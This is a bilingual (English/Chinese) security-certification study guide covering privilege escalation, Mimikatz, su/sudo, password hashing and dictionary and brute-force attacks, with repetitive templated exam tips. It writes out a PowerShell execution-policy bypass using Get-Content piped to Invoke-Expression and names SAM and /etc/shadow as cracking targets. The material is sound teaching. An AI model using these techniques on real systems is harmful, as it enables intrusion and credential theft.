认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 33 / PDF P1000

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Horizontal is side to side, and vertical is up and down. If you have trouble remembering the difference between the two, think about watching a sunset (or sunrise) over the ocean. The horizon is the theoretical line going from left to right, separating the sky from the earth. Imagine an attacker gains control of a regular user's account, such as after a successful phishing attack. Horizontal privilege escalation gives an attacker similar privileges as the first compromised user, but from other accounts. Vertical privilege escalation provides an attacker with significantly greater privileges.

After compromising a regular user's account, an attacker can use vertical privilege escalation techniques to gain administrator privileges on the user's computer. The attacker can then use horizontal privilege escalation techniques to access other computers in the network. This horizontal privilege escalation throughout the network is also known as lateral movement. The attacker can then attempt vertical escalation techniques on every other compromised computer. The “Mimikatz” section, later in this chapter, explains how attackers can use this tool to gain more and more privileges within a network.

After infecting a regular user's computer, attackers use Mimikatz to gain administrator privileges on the user's computer and then move throughout the network, gaining more privileges. Given enough time, the attacker will often gain domain administrator privileges. Chapter 13 discussed service accounts within the context of service authentication. These are frequently called managed service accounts because administrators create them to run services or applications and manage them. As an example, it's common to set the password so that it never expires but manually change the password regularly.

An important consideration with managed service accounts is to ensure they have only the privileges needed by the service or application. For example, imagine you install a database application. The application needs to run under the context of a service account with specific rights and permissions. The easiest way to do this is to use the LocalSystem account because it has full administrative privileges on the local system, and you don't have to manage the password. However, the easiest way is not the correct way.

中文直译 / 整理

水平是左右方向,垂直是上下方向。 如果你难以区分这两者,可以想象 在海洋上观看日落(或日出)。 地平线是一条理论上的水平线,从左到右延 伸,将天空与大地分隔开。 想象攻击者成功实施钓鱼攻击后,获得了普通用户账户的控制权。 水平权限 提升使攻击者能够以其他账户获得与首个被入侵用户相似的权限。 垂直权限提升为攻击者提供了显著更高的权限。 在入侵普通用户账户后,攻击 者可以使用垂直权限提升技术,获取该用户计算机上的管理员权限。 随后,攻 击者可以利用水平权限提升技术访问网络中的其他计算机。 这种在整个网络中 进行的水平权限提升也被称为横向移动。 攻击者随后可以在每台已被入侵的计 算机上尝试垂直提升权限。 本章后续的“Mimikatz”部分将解释攻击者如何使用此工具在网络中逐步获 取更多权限。 在感染普通用户的计算机后,攻击者使用Mimikatz获取该用户 计算机上的管理员权限,然后在全网中移动并获取更多权限。 如果有足够的时 间,攻击者通常会获得域管理员权限。 第13章在服务身份验证的背景下讨论了服务账户。 这些账户通常被称为托 管服务账户,因为管理员创建它们以运行服务或应用程序并进行管理。

例 如,通常会将密码设置为永不过期,但定期手动更改密码。 使用托管服务账户时,一个重要考虑因素是确保它们仅拥有服务或应用程序所 需的权限。 例如,假设您安装了一个数据库应用程序。 该应用程序需要在具有 特定权利和权限的服务账户上下文中运行。 最简单的方法是使用 LocalSystem账户,因为它在本地系统上具有完全管理员权限,且您无需管理 密码。 然而,最简单的方法并非正确的方法。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
学习单元 34 / PDF P1001

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Instead, you would create a new account and give it only the needed rights and permissions. Using the su and sudo Commands Linux systems have a root user account, sometimes called a superuser account. The root account on Linux is similar to an administrator account on Windows systems. Users can log on to the root account with root as the username and the root password. However, doing so isn't normally recommended, because it's easy to forget that you're logged on as a superuser. Instead, administrators log on with a regular account when doing daily tasks. When they need to run commands as the root account, they use the su command (short for switch user or substitute user).

The su command switches to the root account by default and prompts the user to enter the root account password. After running commands with elevated permissions, administrators can return to their regular accounts. Another alternative is the sudo command, sometimes referred to as superuser do. Administrators with root privileges can grant permission to any user to run the sudo command by adding them to the sudo group. This is similar to adding a user to the Administrators group on Windows systems. When users are added to the sudo group, they don't need the password to the root account but instead use their own credentials.

Once logged in, the user can prefix commands with sudo to run the command as root. Logs will record any commands using sudo with the user's account, providing auditing capabilities. In contrast, if the user switches to the su account with the su command, logs will record the activity using the su account, not the user's account.

中文直译 / 整理

相反,您将创建一个新账户,并仅赋予其所需的权限和权利。 使用 su 和 sudo 命令 Linux 系统有一个 root 用户账户,有时也称为超级用户账户。 Linux 上的 root 账户类似于 Windows 系统上的管理员账户。 用户可以使用 root 作为用 户名和 root 密码登录到 root 账户。 然而,通常不建议这样做,因为很容易忘 记自己是以超级用户身份登录的。 相反,管理员在执行日常任务时使用普通账户登录。 当他们需要以 root 账户运 行命令时,会使用 su 命令(switch user 或 substitute user 的缩写)。 su 命 令默认切换到 root 账户,并提示用户输入 root 账户密码。 在使用提升的权限 运行命令后,管理员可以返回到他们的普通账户。 另一种选择是 sudo 命令,有时被称为 superuserdo。 拥有 root 权限的管理员 可以通过将任何用户添加到 sudo 组来授予其运行 sudo 命令的权限。 这类似于 在 Windows 系统中将用户添加到 Administrators 组。

当用户被添加到 sudo 组后,他们无需输入 root 账户的密码,而是使用自己的凭据。 登录后, 用户可以在命令前加上 sudo 以 root 身份运行该命令。 日志将记录使用 sudo 的 任何命令及其对应的用户账户,从而提供审计功能。 相比之下,如果用户使用 su 命令切换到 su 账户,日志将记录的是 su 账户的活动,而非用户自己的账户。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

身份:身份是主体在系统中的标识。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

身份管理题要区分识别、认证、授权、审计。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 35 / PDF P1002

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

Privilege Escalation with PowerShell Imagine an application is installed on a Windows server using the LocalSystem account instead of a service account. Later, an attacker discovers and exploits a vulnerability in the application, giving the attacker access to the LocalSystem account with full local administrative privileges. Many Windows systems have PowerShell installed by default, so the attacker can now use it as fileless malware and run PowerShell scripts as an administrator. The attacker can start with some network reconnaissance. As an example, the Get-ADComputer cmdlet will retrieve a listing of all computers in an Active Directory domain.

The attacker can then run PowerShell scripts on any remote computer. By default, the execution policy for PowerShell is set to Restricted, indicating you can't run PowerShell scripts. For example, the execution policy causes the following command to fail: powershell.exe .\hello.ps1 The hello.ps1 script simply displays Hello World to the screen. Instead of calling the script, you can use the Get-Content cmdlet to read the script, and then pass the text to PowerShell with the Invoke-Expression cmdlet. powershell.exe "& {Get-Content .\hello.ps1 | Invoke-Expression} The key here is that using the LocalSystem account provides full administrative access to the local system.

Whenever possible, it's best to create a service account instead of using the LocalSystem account. Password Attacks Passwords are the weakest form of authentication, and there are many types of password attacks. If an attacker is successful in a password attack, the attacker can access the account and access resources authorized to the

中文直译 / 整理

使用 PowerShell 进行权限提升 假设某个应用程序在 Windows 服务器上使用 LocalSystem 账户而非服 务账户进行安装。 后来,攻击者发现并利用了该应用程序中的漏洞,从而 获得了具有完整本地管理员权限的 LocalSystem 账户访问权。 许多 Windows 系统默认都安装了 PowerShell,因此攻击者现在可以将其用 作无文件恶意软件,并以管理员身份运行 PowerShell 脚本。 攻击者可以从网络侦察开始。 例如,Get-ADComputer cmdlet 将检索 Active Directory 域中所有计算机的列表。 然后,攻击者可以在任何远程 计算机上运行 PowerShell 脚本。 默认情况下,PowerShell 的执行策略设置为 Restricted,表示您无法 运行 PowerShell 脚本。 例如,执行策略会导致以下命令失败: powershell.exe .\hello.ps1 hello.ps1 脚本只是在屏幕上显示 Hello World。

与其直接调用脚本,不 如使用 Get-Content cmdlet 读取脚本内容,然后通过 Invoke-Expression cmdlet 将文本传递给 PowerShell。 powershell.exe "& {Get‑Content .\hello.ps1 | Invoke‑Expression}" 这里的关键是,使用 LocalSystem 帐户可获得对本地系统的完全管理权 限。 尽可能创建一个服务帐户,而不是使用 LocalSystem 帐户。 密码攻击 密码是最薄弱的认证形式,存在多种密码攻击类型。 如果攻击者成功实施密码 攻击,即可访问账户并获取该账户被授权的资源

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 36 / PDF P1003

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

account. If an attacker discovers a root or administrator password, the attacker can access any other account and its resources. If attackers discover passwords for privileged accounts in a high-security environment, the environment's security can never be fully trusted again. The attacker could have created other accounts or backdoors to access the system. Instead of accepting the risk, an organization may choose to rebuild the entire system from scratch. A strong password is sufficiently long, uses a combination of character types, and helps prevent password attacks. The phrase “sufficiently long” is a moving target and dependent on the usage and the environment.

Chapter 13 discusses password policies, strong passwords, and the use of passphrases. The important point is that longer passwords are stronger than shorter passwords when using the same character types, and longer passwords with multiple character types create even stronger passwords. Although security professionals usually know what makes a strong password, many users do not, and it is common for users to create short passwords with only a single character type. Past data breaches help illustrate this. After the data breach, attackers often post stolen databases with account names and hashed passwords.

Analysis of these databases shows that many users still use simple passwords such as 12345, 123456, 1234567, 12345678, 123456789, password, and abc123. Organizations rarely store passwords in cleartext. Instead, they use a strong hashing function such as SHA-3 and create a hash of the password. They then store the hash instead of the password. Chapter 6 covers hashing in more depth. As a reminder, a hash is simply an alphanumeric string created by executing a hashing algorithm against a string of characters or file. A hashing algorithm will always produce the same hash when run against the same password.

When a user authenticates, the system hashes the provided password and typically sends the hash to an authentication server in an encrypted format. The authentication server decrypts the message containing the hash and then compares that decrypted value to the stored hash for the user. If the hashes match, the system authenticates the user. It's important to use strong hashing functions when hashing passwords. Many password attacks succeed when organizations have used weak hashing functions, such as Message Digest 5 (MD5). MD5 is compromised and not

中文直译 / 整理

账户。 如果攻击者发现了根账户或管理员密码,即可访问任何其他账户及其资 源。 如果攻击者在高安全环境中发现了特权账户的密码,该环境的安全性将再 也无法完全信任。 攻击者可能已创建了其他账户或后门以访问系统。 与其接受 这一风险,组织可以选择从头开始重建整个系统。 A 强密码 足够长,使用多种字符类型的组合,有助于防止密码攻击。 "足够长" 这一说法是动态变化的,取决于使用场景和环境。 第 13 章 讨论了密码策略、 强密码和口令短语的使用。 关键点在于,在使用相同字符类型的情况下,较长 的密码比短密码更安全; 而使用多种字符类型的更长密码则能创建出更强的密 码。 尽管安全专业人员通常知道什么构成强密码,但许多用户并不了解,用户常常 创建仅包含单一字符类型的短密码。 以往的数据泄露事件有助于说明这一点。 数据泄露后,攻击者通常会发布包含账户名和哈希密码的被盗数据库。 对这些 数据库的分析显示,许多用户仍使用简单的密码,例如 12345、123456、 1234567、12345678、123456789、password 和 abc123。 组织很少以明文形式存储密码。

相反,他们使用强哈希函数(如 SHA‑3)对密 码进行哈希处理,然后存储哈希值而非密码本身。 第 6 章更深入地介绍了哈希 技术。 作为提醒,哈希是通过将哈希算法应用于一串字符或文件而生成的字母 数字字符串。 相同的密码在运行哈希算法时总是产生相同的哈希值。 当用户进行身份验证时,系统会对提供的密码进行哈希处理,并通常以加密格 式将哈希值发送到身份验证服务器。 身份验证服务器解密包含哈希值的消息, 然后将解密后的值与用户存储的哈希值进行比较。 如果哈希值匹配,系统将验 证用户身份。 在哈希密码时,使用强哈希函数非常重要。 许多密码攻击之所以成功,是因为 组织使用了弱哈希函数,例如消息摘要5(MD5)。 MD5已被破解,不

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

哈希本身不提供机密性;它主要用于完整性校验。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
身份 身份是主体在系统中的标识。
学习单元 37 / PDF P1004

第 1004 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

recommended for use as a cryptographic hashing function. It should not be used to hash passwords. It's also important to change default passwords. IT professionals know this for computers, but this knowledge hasn't extended consistently to IoT devices and embedded systems. Chapter 9 covers IoT devices and embedded systems in more depth. If the default password isn't changed, anyone who knows the default password can log in and cause problems. The following sections describe common password attacks using a variety of methods. Some of these attacks are possible against online accounts.

As an example, an attacker could try to guess the usernames and passwords on an online web server or web application. In other attacks, an attacker steals an account database and then cracks the passwords using an offline attack. Account databases can be customer databases, or operating system files such as the Windows-based Security Account Manager (SAM) file or the /etc/shadow file on Linux systems. Dictionary Attack A dictionary attack is an attempt to discover passwords by using every possible password in a predefined database or list of common or expected passwords. In other words, an attacker starts with a database of words commonly found in a dictionary.

Dictionary attack databases also include character combinations widely used as weak passwords but not found in dictionaries. For example, you will probably see passwords such as 123456 and password in password-cracking dictionaries. Additionally, dictionary attacks often scan for one-upped-constructed passwords. A one-upped-constructed password is a previously used password, but with one character different. For example, password1 is one-upped from password, as are password2, 1password, and passXword. Attackers often use this approach when generating rainbow tables (discussed later in this chapter). Some people think that using a foreign word as a password will beat dictionary attacks.

However, password-cracking dictionaries can, and often do, include foreign words.

中文直译 / 整理

应作为加密哈希函数使用。 不应使用MD5来哈希密码。 更改默认密码也很重要。 IT专业人员知道这适用于计算机,但这一知识并未一 致地扩展到物联网设备和嵌入式系统。 第9章更深入地探讨了物联网设备和嵌入 式系统。 如果未更改默认密码,任何知道默认密码的人都可以登录并造成问题。 以下部分描述了使用多种方法的常见密码攻击。 其中一些攻击适用于在线账户。 例如,攻击者可以尝试猜测在线Web服务器或Web应用程序上的用户名和密 码。 在其他攻击中,攻击者窃取账户数据库,然后使用离线攻击破解密码。 账 户数据库可以是客户数据库,也可以是操作系统文件,例如基于Windows的 安全账户管理器(SAM)文件或Linux系统上的/etc/shadow文件。 字典攻击 字典攻击是通过使用预定义数据库或常见或预期密码列表中的所有可能密码 来尝试发现密码的方法。 换句话说,攻击者从一个常见于字典中的单词数据 库开始。 字典攻击数据库还包括广泛用作弱密码但未出现在字典中的字符组 合。 例如,你可能会在密码破解字典中看到诸如123456和password这样的 密码。 此外,字典攻击通常会扫描由递增构造的密码。

递增构造的密码是指之前使用 过的密码,但其中有一个字符不同。 例如,password1 是由 password 递增而 来,password2、1password 和 passXword 也是如此。 攻击者在生成彩虹表 时(本章稍后将讨论)经常使用这种方法。 有些人认为,使用外语单词作为密码可以抵御字典攻击。 然而,密码 破解字典中常常包含外语单词。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1004 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 38 / PDF P1005

第 1005 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Brute-Force Attack A brute-force attack is an attempt to discover passwords for user accounts by systematically attempting all possible combinations of letters, numbers, and symbols. Attackers don't typically type these in manually but instead have programs that can programmatically try all the combinations. A hybrid attack attempts a dictionary attack and then performs a type of brute-force attack with one-upped-constructed passwords. Longer and more complex passwords take more time and are costlier to crack than simple passwords. As the number of possibilities increases, the cost of performing an exhaustive attack goes up.

In other words, the longer the password and the more character types it includes, the more secure it is against brute-force attacks. Passwords and usernames are typically stored in an account database file on secured systems. However, instead of being stored as plaintext, systems and applications commonly hash passwords and store only the hash values. The following three steps illustrate one way that a user might authenticate with a hashed password: 1. The user enters credentials such as a username and password. 2. The user's system hashes the password and sends the hash to the authenticating system. 3.

The authenticating system compares this hash to the hash stored in the password database file. If it matches, it indicates the user entered the correct password. This approach provides two protections. Passwords do not traverse the network in cleartext, which would make them susceptible to sniffing attacks. Password databases do not store passwords in cleartext, but instead store them as hashes. Passwords stored as cleartext would be much easier for attackers to read if they gained access to the password database. However, password attacker tools look for a password that creates the same hash value as an entry stored in the account database file.

If they're successful, they can use the password to log on to the account. As an example, imagine the password IPassed has a stored hash value of 1A5C7G hexadecimal (though the actual hash would be much longer). A brute-force password tool would take these steps:

中文直译 / 整理

暴力破解攻击 暴力破解攻击是通过系统性地尝试所有可能的字母、数字和符号组合来发现用 户账户密码的一种方法。 攻击者通常不会手动输入这些组合,而是使用程序自 动尝试所有可能的组合。 一种混合攻击会先尝试字典攻击,然后使用构造出的增强密码执行一种暴力破 解攻击。 更长且更复杂的密码比简单密码需要更多时间且破解成本更高。 随着可能性数 量的增加,执行穷举攻击的成本也随之上升。 换句话说,密码越长、包含的字 符类型越多,其对抗暴力破解攻击的安全性就越高。 在安全系统中,密码和用户名通常存储在账户数据库文件中。 然而,系统和应用 程序通常不会以明文形式存储密码,而是对密码进行哈希处理,仅存储哈希值。 以下三个步骤说明了用户如何使用哈希密码进行身份验证的一种方式: 1. 用户输入凭据,例如用户名和密码。 2. 用户的系统对密码进行哈希运算,并将哈希值发送到认证系统。 3. 认证系统将此哈希值与密码数据库文件中存储的哈希值进行比较。 如果 匹配,则表明用户输入了正确的密码。 这种方法提供了两项保护措施。 密码不会以明文形式在网络中传输,否则容易 受到嗅探攻击。 密码数据库不以明文形式存储密码,而是将其存储为哈希值。

如果攻击者获得了密码数据库的访问权限,以明文存储的密码将更容易被读取。 然而,密码攻击工具会寻找能够生成与账户数据库文件中存储条目相同哈希值 的密码。 如果成功,攻击者便可使用该密码登录账户。 例如,假设密码 IPassed 的存储哈希值为 1A5C7G 十六进制(实际哈希值要长得多)。 暴力破 解密码工具将执行以下步骤:

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

程序:程序是一步一步怎么做。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1005 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 39 / PDF P1006

第 1006 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

1. Guess a password. 2. Calculate the hash of the guessed password. 3. Compare the calculated hash against the stored hash in the offline database. 4. Repeat steps 1 through 3 until a guessed password has the same hash as a stored password. This is also known as comparative analysis or reverse-hash matching. When the password-cracking tool finds a matching hash value, it indicates that the guessed password is very likely the original password. The attacker can now use this password to impersonate the user. If two separate passwords create the same hash, it results in a collision. Collisions aren't desirable, and better hashing functions are collision resistant.

Unfortunately, some hashing functions (such as MD5) allow an attacker to create a different password that results in the same hash as a hashed password stored in the account database file. This is one of the reasons that MD5 is not recommended for hashing passwords today. With the speed of modern computers and the ability to employ distributed computing, brute-force attacks prove successful against even some strong passwords. The actual time it takes to discover passwords depends on the algorithm used to hash them and the power of the computer. Many attackers are using GPUs in brute-force attacks. In general, GPUs have more processing power than most CPUs in desktop computers.

Additionally, it's relatively easy for a do-it-yourselfer to create a multiple-GPU computer and use it to crack passwords in offline databases. However, longer passwords take longer to crack than shorter and simple passwords. For example, a 15-character password using uppercase and lowercase characters takes longer to crack than an 8-character password. Similarly, a complex 15-character password using all four character types (uppercase, lowercase, numbers, and special characters) takes longer to crack than a 15-character password using only uppercase and lowercase characters. 1.

中文直译 / 整理

猜测一个密码。 2. 计算猜测密码的哈希值。 3. 将计算出的哈希值与离线数据库中存储的哈希值进行比较。 4. 重复步骤1至3,直到猜测的密码与存储密码的哈希值相同。 这也被称为比较分析或反向哈希匹配。 当密码破解工具找到匹配的哈希值时, 表明猜测的密码极有可能是原始密码。 攻击者现在可以使用此密码冒充用户。 如果两个不同的密码生成了相同的哈希值,则会发生碰撞。 碰撞是不希望 出现的,更好的哈希函数应具备抗碰撞能力。 不幸的是,某些哈希函数 (如MD5)允许攻击者创建一个不同的密码,使其哈希值与账户数据库文 件中存储的哈希值相同。 这也是为什么今天不推荐使用MD5进行密码哈希 的原因之一。 借助现代计算机的速度和分布式计算能力,暴力破解攻击甚至能成功破解一 些强密码。 实际破解密码所需的时间取决于用于哈希的算法以及计算机的性 能。 许多攻击者在暴力破解攻击中使用GPU。 通常情况下,GPU的处理能力比大 多数台式机中的CPU更强。 此外,DIY爱好者相对容易构建多GPU计算机,并 用其破解离线数据库中的密码。 然而,较长的密码比简短且简单的密码更难破解。 例如,使用大小写字母的1 5位密码比8位密码更难破解。

同样,使用所有四种字符类型(大写字母、小写 字母、数字和特殊字符)的复杂15位密码,比仅使用大小写字母的15位密码更 难破解。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1006 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
